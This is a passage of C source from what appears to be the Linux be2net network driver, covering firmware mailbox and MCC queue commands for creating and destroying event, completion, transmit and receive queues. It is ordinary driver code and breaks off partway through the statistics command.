inline bool be_mcc_compl_is_new(struct be_mcc_compl *compl) { if (compl->flags != 0) { compl->flags = le32_to_cpu(compl->flags); BUG_ON((compl->flags & CQE_FLAGS_VALID_MASK) == 0); return true; } else { return false; } } /* Need to reset the entire word that houses the valid bit */ static inline void be_mcc_compl_use(struct be_mcc_compl *compl) { compl->flags = 0; } static int be_mcc_compl_process(struct be_adapter *adapter, struct be_mcc_compl *compl) { u16 compl_status, extd_status; /* Just swap the status to host endian; mcc tag is opaquely copied * from mcc_wrb */ be_dws_le_to_cpu(compl, 4); compl_status = (compl->status >> CQE_STATUS_COMPL_SHIFT) & CQE_STATUS_COMPL_MASK; if (((compl->tag0 == OPCODE_COMMON_WRITE_FLASHROM) || (compl->tag0 == OPCODE_COMMON_WRITE_OBJECT)) && (compl->tag1 == CMD_SUBSYSTEM_COMMON)) { adapter->flash_status = compl_status; complete(&adapter->flash_compl); } if (compl_status == MCC_STATUS_SUCCESS) { if (((compl->tag0 == OPCODE_ETH_GET_STATISTICS) || (compl->tag0 == OPCODE_ETH_GET_PPORT_STATS)) && (compl->tag1 == CMD_SUBSYSTEM_ETH)) { be_parse_stats(adapter); adapter->stats_cmd_sent = false; } if (compl->tag0 == OPCODE_COMMON_GET_CNTL_ADDITIONAL_ATTRIBUTES) { struct be_mcc_wrb *mcc_wrb = queue_index_node(&adapter->mcc_obj.q, compl->tag1); struct be_cmd_resp_get_cntl_addnl_attribs *resp = embedded_payload(mcc_wrb); adapter->drv_stats.be_on_die_temperature = resp->on_die_temperature; } } else { if (compl->tag0 == OPCODE_COMMON_GET_CNTL_ADDITIONAL_ATTRIBUTES) be_get_temp_freq = 0; if (compl_status == MCC_STATUS_NOT_SUPPORTED || compl_status == MCC_STATUS_ILLEGAL_REQUEST) goto done; if (compl_status == MCC_STATUS_UNAUTHORIZED_REQUEST) { dev_warn(&adapter->pdev->dev, "This domain(VM) is not " "permitted to execute this cmd (opcode %d)\n", compl->tag0); } else { extd_status = (compl->status >> CQE_STATUS_EXTD_SHIFT) & CQE_STATUS_EXTD_MASK; dev_err(&adapter->pdev->dev, "Cmd (opcode %d) failed:" "status %d, extd-status %d\n", compl->tag0, compl_status, extd_status); } } done: return compl_status; } /* Link state evt is a string of bytes; no need for endian swapping */ static void be_async_link_state_process(struct be_adapter *adapter, struct be_async_event_link_state *evt) { /* When link status changes, link speed must be re-queried from FW */ adapter->link_speed = -1; /* For the initial link status do not rely on the ASYNC event as * it may not be received in some cases. */ if (adapter->flags & BE_FLAGS_LINK_STATUS_INIT) be_link_status_update(adapter, evt->port_link_status); } /* Grp5 CoS Priority evt */ static void be_async_grp5_cos_priority_process(struct be_adapter *adapter, struct be_async_event_grp5_cos_priority *evt) { if (evt->valid) { adapter->vlan_prio_bmap = evt->available_priority_bmap; adapter->recommended_prio &= ~VLAN_PRIO_MASK; adapter->recommended_prio = evt->reco_default_priority << VLAN_PRIO_SHIFT; } } /* Grp5 QOS Speed evt */ static void be_async_grp5_qos_speed_process(struct be_adapter *adapter, struct be_async_event_grp5_qos_link_speed *evt) { if (evt->physical_port == adapter->port_num) { /* qos_link_speed is in units of 10 Mbps */ adapter->link_speed = evt->qos_link_speed * 10; } } /*Grp5 PVID evt*/ static void be_async_grp5_pvid_state_process(struct be_adapter *adapter, struct be_async_event_grp5_pvid_state *evt) { if (evt->enabled) adapter->pvid = le16_to_cpu(evt->tag) & VLAN_VID_MASK; else adapter->pvid = 0; } static void be_async_grp5_evt_process(struct be_adapter *adapter, u32 trailer, struct be_mcc_compl *evt) { u8 event_type = 0; event_type = (trailer >> ASYNC_TRAILER_EVENT_TYPE_SHIFT) & ASYNC_TRAILER_EVENT_TYPE_MASK; switch (event_type) { case ASYNC_EVENT_COS_PRIORITY: be_async_grp5_cos_priority_process(adapter, (struct be_async_event_grp5_cos_priority *)evt); break; case ASYNC_EVENT_QOS_SPEED: be_async_grp5_qos_speed_process(adapter, (struct be_async_event_grp5_qos_link_speed *)evt); break; case ASYNC_EVENT_PVID_STATE: be_async_grp5_pvid_state_process(adapter, (struct be_async_event_grp5_pvid_state *)evt); break; default: dev_warn(&adapter->pdev->dev, "Unknown grp5 event!\n"); break; } } static inline bool is_link_state_evt(u32 trailer) { return ((trailer >> ASYNC_TRAILER_EVENT_CODE_SHIFT) & ASYNC_TRAILER_EVENT_CODE_MASK) == ASYNC_EVENT_CODE_LINK_STATE; } static inline bool is_grp5_evt(u32 trailer) { return (((trailer >> ASYNC_TRAILER_EVENT_CODE_SHIFT) & ASYNC_TRAILER_EVENT_CODE_MASK) == ASYNC_EVENT_CODE_GRP_5); } static struct be_mcc_compl *be_mcc_compl_get(struct be_adapter *adapter) { struct be_queue_info *mcc_cq = &adapter->mcc_obj.cq; struct be_mcc_compl *compl = queue_tail_node(mcc_cq); if (be_mcc_compl_is_new(compl)) { queue_tail_inc(mcc_cq); return compl; } return NULL; } void be_async_mcc_enable(struct be_adapter *adapter) { spin_lock_bh(&adapter->mcc_cq_lock); be_cq_notify(adapter, adapter->mcc_obj.cq.id, true, 0); adapter->mcc_obj.rearm_cq = true; spin_unlock_bh(&adapter->mcc_cq_lock); } void be_async_mcc_disable(struct be_adapter *adapter) { adapter->mcc_obj.rearm_cq = false; } int be_process_mcc(struct be_adapter *adapter) { struct be_mcc_compl *compl; int num = 0, status = 0; struct be_mcc_obj *mcc_obj = &adapter->mcc_obj; spin_lock_bh(&adapter->mcc_cq_lock); while ((compl = be_mcc_compl_get(adapter))) { if (compl->flags & CQE_FLAGS_ASYNC_MASK) { /* Interpret flags as an async trailer */ if (is_link_state_evt(compl->flags)) be_async_link_state_process(adapter, (struct be_async_event_link_state *) compl); else if (is_grp5_evt(compl->flags)) be_async_grp5_evt_process(adapter, compl->flags, compl); } else if (compl->flags & CQE_FLAGS_COMPLETED_MASK) { status = be_mcc_compl_process(adapter, compl); atomic_dec(&mcc_obj->q.used); } be_mcc_compl_use(compl); num++; } if (num) be_cq_notify(adapter, mcc_obj->cq.id, mcc_obj->rearm_cq, num); spin_unlock_bh(&adapter->mcc_cq_lock); return status; } /* Wait till no more pending mcc requests are present */ static int be_mcc_wait_compl(struct be_adapter *adapter) { #define mcc_timeout 120000 /* 12s timeout */ int i, status = 0; struct be_mcc_obj *mcc_obj = &adapter->mcc_obj; for (i = 0; i < mcc_timeout; i++) { if (be_error(adapter)) return -EIO; status = be_process_mcc(adapter); if (atomic_read(&mcc_obj->q.used) == 0) break; udelay(100); } if (i == mcc_timeout) { dev_err(&adapter->pdev->dev, "FW not responding\n"); adapter->fw_timeout = true; return -1; } return status; } /* Notify MCC requests and wait for completion */ static int be_mcc_notify_wait(struct be_adapter *adapter) { be_mcc_notify(adapter); return be_mcc_wait_compl(adapter); } static int be_mbox_db_ready_wait(struct be_adapter *adapter, void __iomem *db) { int msecs = 0; u32 ready; do { if (be_error(adapter)) return -EIO; ready = ioread32(db); if (ready == 0xffffffff) return -1; ready &= MPU_MAILBOX_DB_RDY_MASK; if (ready) break; if (msecs > 4000) { dev_err(&adapter->pdev->dev, "FW not responding\n"); adapter->fw_timeout = true; be_detect_dump_ue(adapter); return -1; } msleep(1); msecs++; } while (true); return 0; } /* * Insert the mailbox address into the doorbell in two steps * Polls on the mbox doorbell till a command completion (or a timeout) occurs */ static int be_mbox_notify_wait(struct be_adapter *adapter) { int status; u32 val = 0; void __iomem *db = adapter->db + MPU_MAILBOX_DB_OFFSET; struct be_dma_mem *mbox_mem = &adapter->mbox_mem; struct be_mcc_mailbox *mbox = mbox_mem->va; struct be_mcc_compl *compl = &mbox->compl; /* wait for ready to be set */ status = be_mbox_db_ready_wait(adapter, db); if (status != 0) return status; val |= MPU_MAILBOX_DB_HI_MASK; /* at bits 2 - 31 place mbox dma addr msb bits 34 - 63 */ val |= (upper_32_bits(mbox_mem->dma) >> 2) << 2; iowrite32(val, db); /* wait for ready to be set */ status = be_mbox_db_ready_wait(adapter, db); if (status != 0) return status; val = 0; /* at bits 2 - 31 place mbox dma addr lsb bits 4 - 33 */ val |= (u32)(mbox_mem->dma >> 4) << 2; iowrite32(val, db); status = be_mbox_db_ready_wait(adapter, db); if (status != 0) return status; /* A cq entry has been made now */ if (be_mcc_compl_is_new(compl)) { status = be_mcc_compl_process(adapter, &mbox->compl); be_mcc_compl_use(compl); if (status) return status; } else { dev_err(&adapter->pdev->dev, "invalid mailbox completion\n"); return -1; } return 0; } static int be_POST_stage_get(struct be_adapter *adapter, u16 *stage) { u32 sem; if (lancer_chip(adapter)) sem = ioread32(adapter->db + MPU_EP_SEMAPHORE_IF_TYPE2_OFFSET); else sem = ioread32(adapter->csr + MPU_EP_SEMAPHORE_OFFSET); *stage = sem & EP_SEMAPHORE_POST_STAGE_MASK; if ((sem >> EP_SEMAPHORE_POST_ERR_SHIFT) & EP_SEMAPHORE_POST_ERR_MASK) return -1; else return 0; } int be_cmd_POST(struct be_adapter *adapter) { u16 stage; int status, timeout = 0; struct device *dev = &adapter->pdev->dev; do { status = be_POST_stage_get(adapter, &stage); if (status) { dev_err(dev, "POST error; stage=0x%x\n", stage); return -1; } else if (stage != POST_STAGE_ARMFW_RDY) { if (msleep_interruptible(2000)) { dev_err(dev, "Waiting for POST aborted\n"); return -EINTR; } timeout += 2; } else { return 0; } } while (timeout < 60); dev_err(dev, "POST timeout; stage=0x%x\n", stage); return -1; } static inline struct be_sge *nonembedded_sgl(struct be_mcc_wrb *wrb) { return &wrb->payload.sgl[0]; } /* Don't touch the hdr after it's prepared */ /* mem will be NULL for embedded commands */ static void be_wrb_cmd_hdr_prepare(struct be_cmd_req_hdr *req_hdr, u8 subsystem, u8 opcode, int cmd_len, struct be_mcc_wrb *wrb, struct be_dma_mem *mem) { struct be_sge *sge; req_hdr->opcode = opcode; req_hdr->subsystem = subsystem; req_hdr->request_length = cpu_to_le32(cmd_len - sizeof(*req_hdr)); req_hdr->version = 0; wrb->tag0 = opcode; wrb->tag1 = subsystem; wrb->payload_length = cmd_len; if (mem) { wrb->embedded |= (1 & MCC_WRB_SGE_CNT_MASK) << MCC_WRB_SGE_CNT_SHIFT; sge = nonembedded_sgl(wrb); sge->pa_hi = cpu_to_le32(upper_32_bits(mem->dma)); sge->pa_lo = cpu_to_le32(mem->dma & 0xFFFFFFFF); sge->len = cpu_to_le32(mem->size); } else wrb->embedded |= MCC_WRB_EMBEDDED_MASK; be_dws_cpu_to_le(wrb, 8); } static void be_cmd_page_addrs_prepare(struct phys_addr *pages, u32 max_pages, struct be_dma_mem *mem) { int i, buf_pages = min(PAGES_4K_SPANNED(mem->va, mem->size), max_pages); u64 dma = (u64)mem->dma; for (i = 0; i < buf_pages; i++) { pages[i].lo = cpu_to_le32(dma & 0xFFFFFFFF); pages[i].hi = cpu_to_le32(upper_32_bits(dma)); dma += PAGE_SIZE_4K; } } /* Converts interrupt delay in microseconds to multiplier value */ static u32 eq_delay_to_mult(u32 usec_delay) { #define MAX_INTR_RATE 651042 const u32 round = 10; u32 multiplier; if (usec_delay == 0) multiplier = 0; else { u32 interrupt_rate = 1000000 / usec_delay; /* Max delay, corresponding to the lowest interrupt rate */ if (interrupt_rate == 0) multiplier = 1023; else { multiplier = (MAX_INTR_RATE - interrupt_rate) * round; multiplier /= interrupt_rate; /* Round the multiplier to the closest value.*/ multiplier = (multiplier + round/2) / round; multiplier = min(multiplier, (u32)1023); } } return multiplier; } static inline struct be_mcc_wrb *wrb_from_mbox(struct be_adapter *adapter) { struct be_dma_mem *mbox_mem = &adapter->mbox_mem; struct be_mcc_wrb *wrb = &((struct be_mcc_mailbox *)(mbox_mem->va))->wrb; memset(wrb, 0, sizeof(*wrb)); return wrb; } static struct be_mcc_wrb *wrb_from_mccq(struct be_adapter *adapter) { struct be_queue_info *mccq = &adapter->mcc_obj.q; struct be_mcc_wrb *wrb; if (atomic_read(&mccq->used) >= mccq->len) { dev_err(&adapter->pdev->dev, "Out of MCCQ wrbs\n"); return NULL; } wrb = queue_head_node(mccq); queue_head_inc(mccq); atomic_inc(&mccq->used); memset(wrb, 0, sizeof(*wrb)); return wrb; } /* Tell fw we're about to start firing cmds by writing a * special pattern across the wrb hdr; uses mbox */ int be_cmd_fw_init(struct be_adapter *adapter) { u8 *wrb; int status; if (mutex_lock_interruptible(&adapter->mbox_lock)) return -1; wrb = (u8 *)wrb_from_mbox(adapter); *wrb++ = 0xFF; *wrb++ = 0x12; *wrb++ = 0x34; *wrb++ = 0xFF; *wrb++ = 0xFF; *wrb++ = 0x56; *wrb++ = 0x78; *wrb = 0xFF; status = be_mbox_notify_wait(adapter); mutex_unlock(&adapter->mbox_lock); return status; } /* Tell fw we're done with firing cmds by writing a * special pattern across the wrb hdr; uses mbox */ int be_cmd_fw_clean(struct be_adapter *adapter) { u8 *wrb; int status; if (mutex_lock_interruptible(&adapter->mbox_lock)) return -1; wrb = (u8 *)wrb_from_mbox(adapter); *wrb++ = 0xFF; *wrb++ = 0xAA; *wrb++ = 0xBB; *wrb++ = 0xFF; *wrb++ = 0xFF; *wrb++ = 0xCC; *wrb++ = 0xDD; *wrb = 0xFF; status = be_mbox_notify_wait(adapter); mutex_unlock(&adapter->mbox_lock); return status; } int be_cmd_eq_create(struct be_adapter *adapter, struct be_queue_info *eq, int eq_delay) { struct be_mcc_wrb *wrb; struct be_cmd_req_eq_create *req; struct be_dma_mem *q_mem = &eq->dma_mem; int status; if (mutex_lock_interruptible(&adapter->mbox_lock)) return -1; wrb = wrb_from_mbox(adapter); req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_EQ_CREATE, sizeof(*req), wrb, NULL); req->num_pages = cpu_to_le16(PAGES_4K_SPANNED(q_mem->va, q_mem->size)); AMAP_SET_BITS(struct amap_eq_context, valid, req->context, 1); /* 4byte eqe*/ AMAP_SET_BITS(struct amap_eq_context, size, req->context, 0); AMAP_SET_BITS(struct amap_eq_context, count, req->context, __ilog2_u32(eq->len/256)); AMAP_SET_BITS(struct amap_eq_context, delaymult, req->context, eq_delay_to_mult(eq_delay)); be_dws_cpu_to_le(req->context, sizeof(req->context)); be_cmd_page_addrs_prepare(req->pages, ARRAY_SIZE(req->pages), q_mem); status = be_mbox_notify_wait(adapter); if (!status) { struct be_cmd_resp_eq_create *resp = embedded_payload(wrb); eq->id = le16_to_cpu(resp->eq_id); eq->created = true; } mutex_unlock(&adapter->mbox_lock); return status; } /* Use MCC */ int be_cmd_mac_addr_query(struct be_adapter *adapter, u8 *mac_addr, u8 type, bool permanent, u32 if_handle, u32 pmac_id) { struct be_mcc_wrb *wrb; struct be_cmd_req_mac_query *req; int status; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_NTWK_MAC_QUERY, sizeof(*req), wrb, NULL); req->type = type; if (permanent) { req->permanent = 1; } else { req->if_id = cpu_to_le16((u16) if_handle); req->pmac_id = cpu_to_le32(pmac_id); req->permanent = 0; } status = be_mcc_notify_wait(adapter); if (!status) { struct be_cmd_resp_mac_query *resp = embedded_payload(wrb); memcpy(mac_addr, resp->mac.addr, ETH_ALEN); } err: spin_unlock_bh(&adapter->mcc_lock); return status; } /* Uses synchronous MCCQ */ int be_cmd_pmac_add(struct be_adapter *adapter, u8 *mac_addr, u32 if_id, u32 *pmac_id, u32 domain) { struct be_mcc_wrb *wrb; struct be_cmd_req_pmac_add *req; int status; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_NTWK_PMAC_ADD, sizeof(*req), wrb, NULL); req->hdr.domain = domain; req->if_id = cpu_to_le32(if_id); memcpy(req->mac_address, mac_addr, ETH_ALEN); status = be_mcc_notify_wait(adapter); if (!status) { struct be_cmd_resp_pmac_add *resp = embedded_payload(wrb); *pmac_id = le32_to_cpu(resp->pmac_id); } err: spin_unlock_bh(&adapter->mcc_lock); if (status == MCC_STATUS_UNAUTHORIZED_REQUEST) status = -EPERM; return status; } /* Uses synchronous MCCQ */ int be_cmd_pmac_del(struct be_adapter *adapter, u32 if_id, int pmac_id, u32 dom) { struct be_mcc_wrb *wrb; struct be_cmd_req_pmac_del *req; int status; if (pmac_id == -1) return 0; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_NTWK_PMAC_DEL, sizeof(*req), wrb, NULL); req->hdr.domain = dom; req->if_id = cpu_to_le32(if_id); req->pmac_id = cpu_to_le32(pmac_id); status = be_mcc_notify_wait(adapter); err: spin_unlock_bh(&adapter->mcc_lock); return status; } /* Uses Mbox */ int be_cmd_cq_create(struct be_adapter *adapter, struct be_queue_info *cq, struct be_queue_info *eq, bool no_delay, int coalesce_wm) { struct be_mcc_wrb *wrb; struct be_cmd_req_cq_create *req; struct be_dma_mem *q_mem = &cq->dma_mem; void *ctxt; int status; if (mutex_lock_interruptible(&adapter->mbox_lock)) return -1; wrb = wrb_from_mbox(adapter); req = embedded_payload(wrb); ctxt = &req->context; be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_CQ_CREATE, sizeof(*req), wrb, NULL); req->num_pages = cpu_to_le16(PAGES_4K_SPANNED(q_mem->va, q_mem->size)); if (lancer_chip(adapter)) { req->hdr.version = 2; req->page_size = 1; /* 1 for 4K */ AMAP_SET_BITS(struct amap_cq_context_lancer, nodelay, ctxt, no_delay); AMAP_SET_BITS(struct amap_cq_context_lancer, count, ctxt, __ilog2_u32(cq->len/256)); AMAP_SET_BITS(struct amap_cq_context_lancer, valid, ctxt, 1); AMAP_SET_BITS(struct amap_cq_context_lancer, eventable, ctxt, 1); AMAP_SET_BITS(struct amap_cq_context_lancer, eqid, ctxt, eq->id); } else { AMAP_SET_BITS(struct amap_cq_context_be, coalescwm, ctxt, coalesce_wm); AMAP_SET_BITS(struct amap_cq_context_be, nodelay, ctxt, no_delay); AMAP_SET_BITS(struct amap_cq_context_be, count, ctxt, __ilog2_u32(cq->len/256)); AMAP_SET_BITS(struct amap_cq_context_be, valid, ctxt, 1); AMAP_SET_BITS(struct amap_cq_context_be, eventable, ctxt, 1); AMAP_SET_BITS(struct amap_cq_context_be, eqid, ctxt, eq->id); } be_dws_cpu_to_le(ctxt, sizeof(req->context)); be_cmd_page_addrs_prepare(req->pages, ARRAY_SIZE(req->pages), q_mem); status = be_mbox_notify_wait(adapter); if (!status) { struct be_cmd_resp_cq_create *resp = embedded_payload(wrb); cq->id = le16_to_cpu(resp->cq_id); cq->created = true; } mutex_unlock(&adapter->mbox_lock); return status; } static u32 be_encoded_q_len(int q_len) { u32 len_encoded = fls(q_len); /* log2(len) + 1 */ if (len_encoded == 16) len_encoded = 0; return len_encoded; } int be_cmd_mccq_ext_create(struct be_adapter *adapter, struct be_queue_info *mccq, struct be_queue_info *cq) { struct be_mcc_wrb *wrb; struct be_cmd_req_mcc_ext_create *req; struct be_dma_mem *q_mem = &mccq->dma_mem; void *ctxt; int status; if (mutex_lock_interruptible(&adapter->mbox_lock)) return -1; wrb = wrb_from_mbox(adapter); req = embedded_payload(wrb); ctxt = &req->context; be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_MCC_CREATE_EXT, sizeof(*req), wrb, NULL); req->num_pages = cpu_to_le16(PAGES_4K_SPANNED(q_mem->va, q_mem->size)); if (lancer_chip(adapter)) { req->hdr.version = 1; req->cq_id = cpu_to_le16(cq->id); AMAP_SET_BITS(struct amap_mcc_context_lancer, ring_size, ctxt, be_encoded_q_len(mccq->len)); AMAP_SET_BITS(struct amap_mcc_context_lancer, valid, ctxt, 1); AMAP_SET_BITS(struct amap_mcc_context_lancer, async_cq_id, ctxt, cq->id); AMAP_SET_BITS(struct amap_mcc_context_lancer, async_cq_valid, ctxt, 1); } else { AMAP_SET_BITS(struct amap_mcc_context_be, valid, ctxt, 1); AMAP_SET_BITS(struct amap_mcc_context_be, ring_size, ctxt, be_encoded_q_len(mccq->len)); AMAP_SET_BITS(struct amap_mcc_context_be, cq_id, ctxt, cq->id); } /* Subscribe to Link State and Group 5 Events(bits 1 and 5 set) */ req->async_event_bitmap[0] = cpu_to_le32(0x00000022); be_dws_cpu_to_le(ctxt, sizeof(req->context)); be_cmd_page_addrs_prepare(req->pages, ARRAY_SIZE(req->pages), q_mem); status = be_mbox_notify_wait(adapter); if (!status) { struct be_cmd_resp_mcc_create *resp = embedded_payload(wrb); mccq->id = le16_to_cpu(resp->id); mccq->created = true; } mutex_unlock(&adapter->mbox_lock); return status; } int be_cmd_mccq_org_create(struct be_adapter *adapter, struct be_queue_info *mccq, struct be_queue_info *cq) { struct be_mcc_wrb *wrb; struct be_cmd_req_mcc_create *req; struct be_dma_mem *q_mem = &mccq->dma_mem; void *ctxt; int status; if (mutex_lock_interruptible(&adapter->mbox_lock)) return -1; wrb = wrb_from_mbox(adapter); req = embedded_payload(wrb); ctxt = &req->context; be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_MCC_CREATE, sizeof(*req), wrb, NULL); req->num_pages = cpu_to_le16(PAGES_4K_SPANNED(q_mem->va, q_mem->size)); AMAP_SET_BITS(struct amap_mcc_context_be, valid, ctxt, 1); AMAP_SET_BITS(struct amap_mcc_context_be, ring_size, ctxt, be_encoded_q_len(mccq->len)); AMAP_SET_BITS(struct amap_mcc_context_be, cq_id, ctxt, cq->id); be_dws_cpu_to_le(ctxt, sizeof(req->context)); be_cmd_page_addrs_prepare(req->pages, ARRAY_SIZE(req->pages), q_mem); status = be_mbox_notify_wait(adapter); if (!status) { struct be_cmd_resp_mcc_create *resp = embedded_payload(wrb); mccq->id = le16_to_cpu(resp->id); mccq->created = true; } mutex_unlock(&adapter->mbox_lock); return status; } int be_cmd_mccq_create(struct be_adapter *adapter, struct be_queue_info *mccq, struct be_queue_info *cq) { int status; status = be_cmd_mccq_ext_create(adapter, mccq, cq); if (status && !lancer_chip(adapter)) { dev_warn(&adapter->pdev->dev, "Upgrade to F/W ver 2.102.235.0 " "or newer to avoid conflicting priorities between NIC " "and FCoE traffic"); status = be_cmd_mccq_org_create(adapter, mccq, cq); } return status; } int be_cmd_txq_create(struct be_adapter *adapter, struct be_queue_info *txq, struct be_queue_info *cq) { struct be_mcc_wrb *wrb; struct be_cmd_req_eth_tx_create *req; struct be_dma_mem *q_mem = &txq->dma_mem; void *ctxt; int status; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); ctxt = &req->context; be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_ETH, OPCODE_ETH_TX_CREATE, sizeof(*req), wrb, NULL); if (lancer_chip(adapter)) { req->hdr.version = 1; AMAP_SET_BITS(struct amap_tx_context, if_id, ctxt, adapter->if_handle); } req->num_pages = PAGES_4K_SPANNED(q_mem->va, q_mem->size); req->ulp_num = BE_ULP1_NUM; req->type = BE_ETH_TX_RING_TYPE_STANDARD; AMAP_SET_BITS(struct amap_tx_context, tx_ring_size, ctxt, be_encoded_q_len(txq->len)); AMAP_SET_BITS(struct amap_tx_context, ctx_valid, ctxt, 1); AMAP_SET_BITS(struct amap_tx_context, cq_id_send, ctxt, cq->id); be_dws_cpu_to_le(ctxt, sizeof(req->context)); be_cmd_page_addrs_prepare(req->pages, ARRAY_SIZE(req->pages), q_mem); status = be_mcc_notify_wait(adapter); if (!status) { struct be_cmd_resp_eth_tx_create *resp = embedded_payload(wrb); txq->id = le16_to_cpu(resp->cid); txq->created = true; } err: spin_unlock_bh(&adapter->mcc_lock); return status; } /* Uses MCC */ int be_cmd_rxq_create(struct be_adapter *adapter, struct be_queue_info *rxq, u16 cq_id, u16 frag_size, u32 if_id, u32 rss, u8 *rss_id) { struct be_mcc_wrb *wrb; struct be_cmd_req_eth_rx_create *req; struct be_dma_mem *q_mem = &rxq->dma_mem; int status; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_ETH, OPCODE_ETH_RX_CREATE, sizeof(*req), wrb, NULL); req->cq_id = cpu_to_le16(cq_id); req->frag_size = fls(frag_size) - 1; req->num_pages = 2; be_cmd_page_addrs_prepare(req->pages, ARRAY_SIZE(req->pages), q_mem); req->interface_id = cpu_to_le32(if_id); req->max_frame_size = cpu_to_le16(BE_MAX_JUMBO_FRAME_SIZE); req->rss_queue = cpu_to_le32(rss); status = be_mcc_notify_wait(adapter); if (!status) { struct be_cmd_resp_eth_rx_create *resp = embedded_payload(wrb); rxq->id = le16_to_cpu(resp->id); rxq->created = true; *rss_id = resp->rss_id; } err: spin_unlock_bh(&adapter->mcc_lock); return status; } /* Generic destroyer function for all types of queues * Uses Mbox */ int be_cmd_q_destroy(struct be_adapter *adapter, struct be_queue_info *q, int queue_type) { struct be_mcc_wrb *wrb; struct be_cmd_req_q_destroy *req; u8 subsys = 0, opcode = 0; int status; if (mutex_lock_interruptible(&adapter->mbox_lock)) return -1; wrb = wrb_from_mbox(adapter); req = embedded_payload(wrb); switch (queue_type) { case QTYPE_EQ: subsys = CMD_SUBSYSTEM_COMMON; opcode = OPCODE_COMMON_EQ_DESTROY; break; case QTYPE_CQ: subsys = CMD_SUBSYSTEM_COMMON; opcode = OPCODE_COMMON_CQ_DESTROY; break; case QTYPE_TXQ: subsys = CMD_SUBSYSTEM_ETH; opcode = OPCODE_ETH_TX_DESTROY; break; case QTYPE_RXQ: subsys = CMD_SUBSYSTEM_ETH; opcode = OPCODE_ETH_RX_DESTROY; break; case QTYPE_MCCQ: subsys = CMD_SUBSYSTEM_COMMON; opcode = OPCODE_COMMON_MCC_DESTROY; break; default: BUG(); } be_wrb_cmd_hdr_prepare(&req->hdr, subsys, opcode, sizeof(*req), wrb, NULL); req->id = cpu_to_le16(q->id); status = be_mbox_notify_wait(adapter); if (!status) q->created = false; mutex_unlock(&adapter->mbox_lock); return status; } /* Uses MCC */ int be_cmd_rxq_destroy(struct be_adapter *adapter, struct be_queue_info *q) { struct be_mcc_wrb *wrb; struct be_cmd_req_q_destroy *req; int status; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_ETH, OPCODE_ETH_RX_DESTROY, sizeof(*req), wrb, NULL); req->id = cpu_to_le16(q->id); status = be_mcc_notify_wait(adapter); if (!status) q->created = false; err: spin_unlock_bh(&adapter->mcc_lock); return status; } /* Create an rx filtering policy configuration on an i/f * Uses MCCQ */ int be_cmd_if_create(struct be_adapter *adapter, u32 cap_flags, u32 en_flags, u8 *mac, u32 *if_handle, u32 *pmac_id, u32 domain) { struct be_mcc_wrb *wrb; struct be_cmd_req_if_create *req; int status; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_NTWK_INTERFACE_CREATE, sizeof(*req), wrb, NULL); req->hdr.domain = domain; req->capability_flags = cpu_to_le32(cap_flags); req->enable_flags = cpu_to_le32(en_flags); if (mac) memcpy(req->mac_addr, mac, ETH_ALEN); else req->pmac_invalid = true; status = be_mcc_notify_wait(adapter); if (!status) { struct be_cmd_resp_if_create *resp = embedded_payload(wrb); *if_handle = le32_to_cpu(resp->interface_id); if (mac) *pmac_id = le32_to_cpu(resp->pmac_id); } err: spin_unlock_bh(&adapter->mcc_lock); return status; } /* Uses MCCQ */ int be_cmd_if_destroy(struct be_adapter *adapter, int interface_id, u32 domain) { struct be_mcc_wrb *wrb; struct be_cmd_req_if_destroy *req; int status; if (interface_id == -1) return 0; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_NTWK_INTERFACE_DESTROY, sizeof(*req), wrb, NULL); req->hdr.domain = domain; req->interface_id = cpu_to_le32(interface_id); status = be_mcc_notify_wait(adapter); err: spin_unlock_bh(&adapter->mcc_lock); return status; } /* Get stats is a non embedded command: the request is not embedded inside * WRB but is a separate dma memory block * Uses asynchronous MCC */ int be_cmd_get_stats(struct be_adapter *adapter, struct be_dma_mem *nonemb_cmd) { struct be_mcc_wrb *wrb; struct be_cmd_req_hdr *hdr; int status = 0; if (MODULO(adapter->work_counter, be_get_temp_freq) == 0) be_cmd_get_die_temperature(adapter); spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } hdr = nonemb_cmd->va; be_wrb_cmd_hdr_prepare(hdr, CMD_SUBSYSTEM_ETH, OPCODE_ETH_GET_STATISTICS, nonemb_cmd->size, wrb, nonemb_cmd); if (adapter->generation == BE_GEN3) hdr->version = 1; be_mcc_notify(adapter); adapter->stats_cmd_sent = true; err: 